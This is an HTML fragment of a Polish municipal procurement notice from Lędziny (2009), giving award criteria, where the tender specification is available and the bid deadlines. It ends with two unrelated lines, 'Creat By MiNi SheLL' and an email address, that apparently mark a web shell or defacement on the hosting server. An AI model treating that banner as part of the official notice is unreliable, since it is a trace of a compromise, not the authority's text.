<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.ledzin.pl/content/show.php?pg=przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Lędziny, 43-143 Lędziny, ul. Ledzińska 55, pokój 105.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 08:50, miejsce: Urząd Miasta Lędziny, 43-143 Lędziny, ul. Ledzińska 55, pokój 105.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com